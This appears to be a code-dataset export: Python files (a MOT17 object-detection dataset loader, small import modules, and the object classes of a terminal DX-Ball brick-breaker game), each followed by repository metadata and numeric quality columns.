from reinvent_scoring.scoring.score_summary import FinalSummary, ComponentSummary, LoggableComponent
from reinvent_scoring.scoring.score_transformations import TransformationFactory
from reinvent_scoring.scoring.scoring_function_factory import ScoringFunctionFactory
from reinvent_scoring.scoring.scoring_function_parameters import ScoringFunctionParameters
| 58.6
| 100
| 0.904437
| 63
| 586
| 8.15873
| 0.31746
| 0.272374
| 0.29572
| 0.404669
| 0.476654
| 0.159533
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059727
| 586
| 9
| 101
| 65.111111
| 0.932849
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d5649c6b0b64ee81194b607ac28c5f2d12f97cb
| 7,014
|
py
|
Python
|
datasets/mot.py
|
yutliu/better_detr
|
f4e309a1947474be0c9aca98afb9adad52193df4
|
[
"Apache-2.0"
] | 3
|
2021-01-05T03:27:33.000Z
|
2021-01-05T09:42:57.000Z
|
datasets/mot.py
|
yutliu/better_detr
|
f4e309a1947474be0c9aca98afb9adad52193df4
|
[
"Apache-2.0"
] | null | null | null |
datasets/mot.py
|
yutliu/better_detr
|
f4e309a1947474be0c9aca98afb9adad52193df4
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Yutliu
"""
MOT dataset which returns image_id for evaluation.
"""
from pathlib import Path
import numpy as np
import torch
import torch.utils.data
import os.path as osp
from PIL import Image, ImageDraw
import datasets.transforms as T
class MOTDetection:
def __init__(self, args, seqs_folder, transforms):
self.args = args
self._transforms = transforms
path = r'/share/home/kaihuatrack/Code/detr/datasets/data_path/mot17.train'
with open(path, 'r') as file:
self.img_files = file.readlines()
self.img_files = [osp.join(seqs_folder, x.strip()) for x in self.img_files]
self.img_files = list(filter(lambda x: len(x) > 0, self.img_files))
self.label_files = [
x.replace('images', 'labels_with_ids').replace('.png', '.txt').replace('.jpg', '.txt')
for x in self.img_files]
self.item_num = len(self.img_files)
def pre_data(self, idx):
img_path = self.img_files[idx]
label_path = self.label_files[idx]
img = Image.open(img_path)
targets = {}
w, h = img._size
if osp.isfile(label_path):
labels0 = np.loadtxt(label_path, dtype=np.float32).reshape(-1, 6)
# Normalized cewh to pixel xyxy format
labels = labels0.copy()
labels[:, 2] = w * (labels0[:, 2] - labels0[:, 4]/2)
labels[:, 3] = h * (labels0[:, 3] - labels0[:, 5]/2)
labels[:, 4] = w * (labels0[:, 2] + labels0[:, 4]/2)
labels[:, 5] = h * (labels0[:, 3] + labels0[:, 5]/2)
# draw = ImageDraw.Draw(img)
# for label in labels:
# draw.rectangle(label[2:6].tolist(), outline=tuple(np.random.randint(0, 255, size=[3])))
# img.show()
targets['boxes'] = []
targets['area'] = []
targets['iscrowd'] = []
targets['labels'] = []
targets['image_id'] = torch.as_tensor(idx)
targets['size'] = torch.as_tensor([h, w])
targets['orig_size'] = torch.as_tensor([h, w])
for label in labels:
targets['boxes'].append(label[2:6].tolist())
targets['area'].append(label[4] * label[5])
targets['iscrowd'].append(0)
targets['labels'].append(0)
targets['area'] = torch.as_tensor(targets['area'])
targets['iscrowd'] = torch.as_tensor(targets['iscrowd'])
targets['labels'] = torch.as_tensor(targets['labels'])
targets['boxes'] = torch.as_tensor(targets['boxes'], dtype=torch.float32).reshape(-1, 4)
targets['boxes'][:, 0::2].clamp_(min=0, max=w)
targets['boxes'][:, 1::2].clamp_(min=0, max=h)
return img, targets
def __getitem__(self, idx):
img, target = self.pre_data(idx)
if self._transforms is not None:
img, target = self._transforms(img, target)
img_path = self.img_files[idx]
return img, target
def __len__(self):
return self.item_num
class MOTDetection_val:
def __init__(self, args, seqs_folder, transforms):
self.args = args
self._transforms = transforms
path = r'/share/home/kaihuatrack/Code/detr/datasets/data_path/mot17.train'
with open(path, 'r') as file:
self.img_files = file.readlines()
self.img_files = [osp.join(seqs_folder, x.strip()) for x in self.img_files]
self.img_files = list(filter(lambda x: len(x) > 0, self.img_files))
self.label_files = [
x.replace('images', 'labels_with_ids').replace('.png', '.txt').replace('.jpg', '.txt')
for x in self.img_files]
self.item_num = len(self.img_files)
def pre_data(self, idx):
img_path = self.img_files[idx]
label_path = self.label_files[idx]
img = Image.open(img_path)
targets = {}
w, h = img._size
if osp.isfile(label_path):
labels0 = np.loadtxt(label_path, dtype=np.float32).reshape(-1, 6)
# Normalized cewh to pixel xyxy format
labels = labels0.copy()
labels[:, 2] = w * (labels0[:, 2] - labels0[:, 4]/2)
labels[:, 3] = h * (labels0[:, 3] - labels0[:, 5]/2)
labels[:, 4] = w * (labels0[:, 2] + labels0[:, 4]/2)
labels[:, 5] = h * (labels0[:, 3] + labels0[:, 5]/2)
# draw = ImageDraw.Draw(img)
# for label in labels:
# draw.rectangle(label[2:6].tolist(), outline=tuple(np.random.randint(0, 255, size=[3])))
# img.show()
targets['boxes'] = []
targets['area'] = []
targets['iscrowd'] = []
targets['labels'] = []
targets['image_id'] = torch.as_tensor(idx)
targets['size'] = torch.as_tensor([h, w])
targets['orig_size'] = torch.as_tensor([h, w])
for label in labels:
targets['boxes'].append(label[2:6].tolist())
targets['area'].append(label[4] * label[5])
targets['iscrowd'].append(0)
targets['labels'].append(0)
targets['area'] = torch.as_tensor(targets['area'])
targets['iscrowd'] = torch.as_tensor(targets['iscrowd'])
targets['labels'] = torch.as_tensor(targets['labels'])
targets['boxes'] = torch.as_tensor(targets['boxes'], dtype=torch.float32).reshape(-1, 4)
targets['boxes'][:, 0::2].clamp_(min=0, max=w)
targets['boxes'][:, 1::2].clamp_(min=0, max=h)
return img, targets
def __getitem__(self, idx):
img, target = self.pre_data(idx)
if self._transforms is not None:
img, target = self._transforms(img, target)
img_path = self.img_files[idx]
return img, target
def __len__(self):
return self.item_num
def make_mot_transforms(image_set):
normalize = T.Compose([
T.ToTensor(),
T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
scales = [480, 512, 544, 576, 608, 640, 672, 704, 736, 768, 800]
if image_set == 'train':
return T.Compose([
T.RandomHorizontalFlip(),
T.RandomSelect(
T.RandomResize(scales, max_size=1333),
T.Compose([
T.RandomResize([400, 500, 600]),
T.RandomSizeCrop(384, 600),
T.RandomResize(scales, max_size=1333),
])
),
normalize,
])
if image_set == 'val':
return T.Compose([
T.RandomResize([800], max_size=1333),
normalize,
])
raise ValueError(f'unknown {image_set}')
def build(image_set, args):
root = Path(args.mot_path)
assert root.exists(), f'provided MOT path {root} does not exist'
if image_set == 'train':
dataset = MOTDetection(args, root, transforms=make_mot_transforms(image_set))
if image_set == 'test':
dataset = MOTDetection_val(args, root, transforms=make_mot_transforms(image_set))
return dataset
| 36.341969
| 105
| 0.563872
| 889
| 7,014
| 4.304837
| 0.184477
| 0.032924
| 0.056441
| 0.041808
| 0.81134
| 0.804808
| 0.78913
| 0.78913
| 0.766658
| 0.766658
| 0
| 0.039437
| 0.280582
| 7,014
| 192
| 106
| 36.53125
| 0.718985
| 0.063872
| 0
| 0.794521
| 0
| 0
| 0.078967
| 0.019551
| 0
| 0
| 0
| 0
| 0.006849
| 1
| 0.068493
| false
| 0
| 0.047945
| 0.013699
| 0.191781
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d56e4a994957760900241cbb071a75c2f5923a2
| 247
|
py
|
Python
|
src/retrieve/methods/align/__init__.py
|
emanjavacas/retrieve
|
451df1cb99d637aca54616c6c342bc0408057c48
|
[
"MIT"
] | null | null | null |
src/retrieve/methods/align/__init__.py
|
emanjavacas/retrieve
|
451df1cb99d637aca54616c6c342bc0408057c48
|
[
"MIT"
] | 2
|
2020-06-04T20:42:16.000Z
|
2020-09-14T07:49:20.000Z
|
src/retrieve/methods/align/__init__.py
|
emanjavacas/retrieve
|
451df1cb99d637aca54616c6c342bc0408057c48
|
[
"MIT"
] | 1
|
2020-07-21T12:45:52.000Z
|
2020-07-21T12:45:52.000Z
|
from .align import BaseScorer, EmbeddingScorer, ConstantScorer, LookupScorer
from .align import get_horizontal_alignment, local_alignment
from .align import get_alignment_ranges, get_alignment_string
from .parallel_align import align_collections
| 41.166667
| 76
| 0.874494
| 30
| 247
| 6.9
| 0.5
| 0.21256
| 0.217391
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089069
| 247
| 5
| 77
| 49.4
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d9632725f09a026d9581e9fcc6358f43e4176a4
| 31,407
|
py
|
Python
|
objects.py
|
veeral-agarwal/DX-BALL
|
d2e83c1cbbccd2122f53b5904066797cd6d30975
|
[
"MIT"
] | null | null | null |
objects.py
|
veeral-agarwal/DX-BALL
|
d2e83c1cbbccd2122f53b5904066797cd6d30975
|
[
"MIT"
] | null | null | null |
objects.py
|
veeral-agarwal/DX-BALL
|
d2e83c1cbbccd2122f53b5904066797cd6d30975
|
[
"MIT"
] | null | null | null |
import global_variables
import numpy as np
import config
from colorama import Fore, init , Back , Style
init()
import time
from time import time,sleep
import random
import math
class Objects():
def __init__(self , obj , xpos , ypos):
self.position_x = xpos
self.position_y = ypos
self.height = len(obj)
self.width = len(obj[0])
self.shape = obj
def update_x_position(self , x):
if self.position_x<=4:
self.position_x=4
if self.position_x>=90:
self.position_x=90
if self.position_x>1 and self.position_x<=90:
self.position_x += x
def update_y_position(self , y):
self.position_y += y
def current_position_x(self):
return self.position_x
def current_position_y(self):
return self.position_y
def clear(self):
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = " "
def render(self):
if global_variables.active_powerupflag[4] == 1 and global_variables.active_powerupflag[1] == 0:
self.shape = config.shrink_p
self.width = len(config.shrink_p[0])
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] =( Back.CYAN + Fore.CYAN + self.shape[j][i] )
elif global_variables.active_powerupflag[1] == 1 and global_variables.active_powerupflag[4] == 0:
self.shape = config.expand_p
self.width = len(config.expand_p[0])
# self.position_x -=1
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] =( Back.CYAN + Fore.CYAN + self.shape[j][i] )
elif (global_variables.active_powerupflag[1] == 1 and global_variables.active_powerupflag[4] == 1) or (global_variables.active_powerupflag[1] == 0 and global_variables.active_powerupflag[4] == 0):
self.shape = config.paddle
self.width = len(config.paddle[0])
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] =( Back.CYAN + Fore.CYAN + self.shape[j][i] )
class Paddle(Objects):
def __init__(self ,obj , xpos , ypos, lives):
self.initial_lives = 5
self.score = 0
super().__init__(obj , xpos , ypos)
def lives(self):
return self.initial_lives
class Ball(Objects):
def __init__(self ,obj , xpos , ypos):
super().__init__(obj , xpos , ypos)
self.speed_x = 0
self.speed_y = 0
self.begin_time = time()
self.onetimetempflag = 0
def speed(self):
self.speed_x = global_variables.ball_privious_speed_x
self.speed_y = global_variables.ball_privious_speed_y
def collision_with_wall(self):
if self.position_x + self.speed_x<=1 or self.position_x+self.speed_x>=96:
self.speed_x *= -1
if self.position_y <=4:
self.speed_y *= -1
elif self.position_y + self.speed_y>=37:
default()
self.speed_x = 0
self.speed_y = 0
def clear(self):
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = " "
def render(self):
if global_variables.active_powerupflag[2] == 1 and self.onetimetempflag == 0:
if self.speed_x < 0:
self.speed_x -=1
else:
self.speed_x += 1
self.onetimetempflag = 1
self.collision_with_wall()
self.collision_with_paddle()
self.position_x += self.speed_x
self.position_y -= self.speed_y
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = self.shape[j][i]
def collision_with_paddle(self):
if (global_variables.active_powerupflag[1] == 1 and global_variables.active_powerupflag[4] == 1) or (global_variables.active_powerupflag[1] == 0 and global_variables.active_powerupflag[4] == 0):
if self.position_y == 35 or self.position_y == 36:
if self.position_x == global_variables.main_paddle.position_x:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x -= 2
elif self.position_x == global_variables.main_paddle.position_x+1:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else :
self.speed_y *= -1
self.speed_x -= 1
elif self.position_x == global_variables.main_paddle.position_x+2:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
elif self.position_x == global_variables.main_paddle.position_x+3:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x += 1
elif self.position_x == global_variables.main_paddle.position_x+4:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x +=2
elif global_variables.active_powerupflag[4] == 1 and global_variables.active_powerupflag[1] == 0:
if self.position_y == 35 or self.position_y == 36:
if self.position_x == global_variables.main_paddle.position_x:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x -= -1
elif self.position_x == global_variables.main_paddle.position_x+1:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
# self.speed_x -= 1
elif self.position_x == global_variables.main_paddle.position_x+2:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x += 1
elif global_variables.active_powerupflag[1] == 1 and global_variables.active_powerupflag[4] == 0:
if self.position_y == 35 or self.position_y == 36:
if self.position_x == global_variables.main_paddle.position_x:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x -= 2
elif self.position_x == global_variables.main_paddle.position_x+1:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x -= 1
elif self.position_x == global_variables.main_paddle.position_x+2:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
elif self.position_x == global_variables.main_paddle.position_x+3:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x += 1
elif self.position_x == global_variables.main_paddle.position_x+4:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x +=2
elif self.position_x == global_variables.main_paddle.position_x+4:
if global_variables.active_powerupflag[3] == 1:
global_variables.ball_privious_speed_x = self.speed_x
global_variables.ball_privious_speed_y = -1*self.speed_y
self.speed_y = 0
self.speed_x = 0
global_variables.flag = 0
global_variables.main_ball.position_y = 34
else:
self.speed_y *= -1
self.speed_x +=3
class Brick(Objects):
def __init__(self, obj , xpos , ypos, weight , power ):
super().__init__(obj , xpos , ypos)
self.weight = weight
self.score = 0
self.flag = 0
self.contain_powerup = power
self.isexplosive = False
def render(self):
for i in range(self.width):
for j in range(self.height):
if (self.weight > 0) and ((self.position_x,self.position_y) not in global_variables.explosion_coordinates):
if self.weight == 1:
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ( Back.BLUE + Fore.BLUE + self.shape[j][i] )
elif self.weight == 2:
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ( Fore.GREEN + Back.GREEN + self.shape[j][i])
elif self.weight == 3:
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ( Fore.RED + Back.RED + self.shape[j][i] )
elif self.weight == 4:
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ( Fore.MAGENTA + Back.MAGENTA + self.shape[j][i] )
elif self.weight == np.inf:
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ( Fore.WHITE + Back.WHITE + self.shape[j][i] )
else:
self.weight = 0
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] =' '
def collision_ball_brick(self):
if self.isexplosive == False:
if (self.position_x == global_variables.main_ball.position_x and self.position_y == global_variables.main_ball.position_y) :
if (self.weight > 0 and self.weight<4) or (self.weight == np.inf):
if global_variables.main_ball.speed_x != 0:
angle = math.degrees( math.atan(global_variables.main_ball.speed_y/global_variables.main_ball.speed_x) )
if ( angle>-45 and angle<45 ) :
if global_variables.active_powerupflag[5] == 0:
global_variables.main_ball.speed_y *= -1
else:
if global_variables.active_powerupflag[5] == 0:
global_variables.main_ball.speed_y *= -1
else:
if global_variables.active_powerupflag[5] == 0:
global_variables.main_ball.speed_y *= -1
if self.weight == 1:
config.score += 1
if self.contain_powerup == 5:
global_variables.powerup_objects.append(Powerup(config.thru_ball , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 4:
global_variables.powerup_objects.append(Powerup(config.shrink_paddle , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 1:
global_variables.powerup_objects.append(Powerup(config.expand_paddle , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 2:
global_variables.powerup_objects.append(Powerup(config.fast_ball , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 3:
global_variables.powerup_objects.append(Powerup(config.paddle_grab , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
global_variables.main_paddle.score += 1
if global_variables.active_powerupflag[5] == 1:
self.weight = 0
config.score += 1
if self.contain_powerup == 5:
global_variables.powerup_objects.append(Powerup(config.thru_ball , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 4:
global_variables.powerup_objects.append(Powerup(config.shrink_paddle , self.position_x , self.position_y , self.contain_powerup))
# global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 1:
global_variables.powerup_objects.append(Powerup(config.expand_paddle , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 2:
global_variables.powerup_objects.append(Powerup(config.fast_ball , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 3:
global_variables.powerup_objects.append(Powerup(config.paddle_grab , self.position_x , self.position_y , self.contain_powerup))
else:
self.weight -= 1
elif (self.position_x+1 == global_variables.main_ball.position_x and self.position_y == global_variables.main_ball.position_y):
if (self.weight > 0 and self.weight<4) or (self.weight == np.inf):
if global_variables.active_powerupflag[5] == 0:
global_variables.main_ball.speed_y *= -1
if self.weight == 1:
config.score += 1
if self.contain_powerup == 5:
global_variables.powerup_objects.append(Powerup(config.thru_ball , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 4:
global_variables.powerup_objects.append(Powerup(config.shrink_paddle , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 1:
global_variables.powerup_objects.append(Powerup(config.expand_paddle , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 2:
global_variables.powerup_objects.append(Powerup(config.fast_ball , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 3:
global_variables.powerup_objects.append(Powerup(config.paddle_grab , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
global_variables.main_paddle.score += 1
if global_variables.active_powerupflag[5] == 1:
self.weight = 0
config.score += 1
if self.contain_powerup == 5:
global_variables.powerup_objects.append(Powerup(config.thru_ball , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 4:
global_variables.powerup_objects.append(Powerup(config.shrink_paddle , self.position_x , self.position_y , self.contain_powerup))
# global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 1:
global_variables.powerup_objects.append(Powerup(config.expand_paddle , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 2:
global_variables.powerup_objects.append(Powerup(config.fast_ball , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 3:
global_variables.powerup_objects.append(Powerup(config.paddle_grab , self.position_x , self.position_y , self.contain_powerup))
else:
self.weight -= 1
elif (self.position_x+2 == global_variables.main_ball.position_x and self.position_y == global_variables.main_ball.position_y):
if (self.weight > 0 and self.weight<4) or (self.weight == np.inf) :
if global_variables.main_ball.speed_x != 0:
angle = math.degrees( math.atan(global_variables.main_ball.speed_y/global_variables.main_ball.speed_x) )
if ((angle>135 and angle<=180)or(angle>=-180 and angle<-135)) :
if global_variables.active_powerupflag[5] == 0:
global_variables.main_ball.speed_y *= -1
else:
if global_variables.active_powerupflag[5] == 0:
global_variables.main_ball.speed_y *= -1
else:
if global_variables.active_powerupflag[5] == 0:
global_variables.main_ball.speed_y *= -1
if self.weight == 1:
config.score += 1
if self.contain_powerup == 5:
global_variables.powerup_objects.append(Powerup(config.thru_ball , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 4:
global_variables.powerup_objects.append(Powerup(config.shrink_paddle , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 1:
global_variables.powerup_objects.append(Powerup(config.expand_paddle , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 2:
global_variables.powerup_objects.append(Powerup(config.fast_ball , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 3:
global_variables.powerup_objects.append(Powerup(config.paddle_grab , self.position_x , self.position_y , self.contain_powerup))
global_variables.inair_powerupflag[self.contain_powerup] = 1
global_variables.main_paddle.score += 1
if global_variables.active_powerupflag[5] == 1:
self.weight = 0
config.score += 1
if self.contain_powerup == 5:
global_variables.powerup_objects.append(Powerup(config.thru_ball , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 4:
global_variables.powerup_objects.append(Powerup(config.shrink_paddle , self.position_x , self.position_y , self.contain_powerup))
# global_variables.inair_powerupflag[self.contain_powerup] = 1
if self.contain_powerup == 1:
global_variables.powerup_objects.append(Powerup(config.expand_paddle , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 2:
global_variables.powerup_objects.append(Powerup(config.fast_ball , self.position_x , self.position_y , self.contain_powerup))
if self.contain_powerup == 3:
global_variables.powerup_objects.append(Powerup(config.paddle_grab , self.position_x , self.position_y , self.contain_powerup))
else:
self.weight -= 1
class Exploding_bricks(Objects):
def __init__(self , obj , xpos , ypos):
super().__init__(obj , xpos , ypos)
self.strength = 1
self.isexplosive = True
self.flag = 0
def clear(self):
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = " "
def render(self):
if self.flag == 0:
if ((self.position_x,self.position_y) in global_variables.explosion_coordinates):
self.flag = 1
self.strength = 0
explosion_coor(self.position_x,self.position_y)
for i in range(self.width):
for j in range(self.height):
if ((self.position_x,self.position_y) not in global_variables.explosion_coordinates):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = self.shape[j][i]
else:
# explosion_coor(self.position_x,self.position_y)
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ' '
def collision_ball_brick(self):
if (self.position_x == global_variables.main_ball.position_x and self.position_y == global_variables.main_ball.position_y) :
explosion_coor(self.position_x,self.position_y)
self.strength = 0
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ' '
elif (self.position_x+1 == global_variables.main_ball.position_x and self.position_y == global_variables.main_ball.position_y) :
self.strength = 0
explosion_coor(self.position_x,self.position_y)
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ' '
elif (self.position_x+2 == global_variables.main_ball.position_x and self.position_y == global_variables.main_ball.position_y) :
self.strength = 0
explosion_coor(self.position_x,self.position_y)
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = ' '
class Powerup(Objects):
def __init__(self,obj,xpos,ypos , power):
super().__init__(obj,xpos,ypos)
self.speed_y = -1
self.contain_powerup = power
self.speed_flag = 0
def render(self):
if self.speed_flag == 0:
# self.shape = [[' ']]
self.position_y -= self.speed_y
self.collision_with_paddle()
for i in range(self.width):
for j in range(self.height):
global_variables.main_board.matrix[j+self.position_y][i+self.position_x] = (self.shape[j][i])
def collision_with_paddle(self):
# if (global_variables.active_powerupflag[1] == 1 and global_variables.active_powerupflag[4] == 1) or (global_variables.active_powerupflag[1] == 0 and global_variables.active_powerupflag[4] == 0):
if self.position_y == 35 or self.position_y == 36:
if self.position_x <= global_variables.main_paddle.position_x+global_variables.main_paddle.width and self.position_x >= global_variables.main_paddle.position_x:
self.speed_flag = 1
# print(self.speed_y)
self.position_y = 2
global_variables.active_powerupflag[self.contain_powerup] = 1
global_variables.powerup_start_time[self.contain_powerup] = time()
global_variables.inair_powerupflag[self.contain_powerup] = 0
self.shape = [[' ']]
if self.position_y > 36:
self.speed_y = 0
self.speed_flag = 1
def explosion_coor(x,y):
lol = []
lol = [(x-3,y),(x+3,y),(x-3,y-1),(x+3,y-1),(x-3,y+1),(x+3,y+1),(x,y-1),(x,y+1),(x,y)]
for i in lol:
global_variables.explosion_coordinates.append(i)
def default():
global_variables.main_paddle.clear()
global_variables.main_ball.clear()
config.lives -= 1
global_variables.flag = 0
global_variables.main_paddle.position_x=5
global_variables.main_paddle.position_y=35
global_variables.main_ball.position_x=5
global_variables.main_ball.position_y=33
#for fast ball
global_variables.main_ball.onetimetempflag = 0
global_variables.main_ball.render()
global_variables.main_paddle.render()
for i in range(len(global_variables.active_powerupflag)):
global_variables.active_powerupflag[i] = 0
| 51.741351
| 204
| 0.562391
| 3,633
| 31,407
| 4.573631
| 0.03248
| 0.212145
| 0.071979
| 0.092441
| 0.901601
| 0.886254
| 0.865852
| 0.833293
| 0.823122
| 0.820294
| 0
| 0.020205
| 0.35231
| 31,407
| 607
| 205
| 51.741351
| 0.796628
| 0.016493
| 0
| 0.763636
| 0
| 0
| 0.000291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.016162
| 0.006061
| 0.088889
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
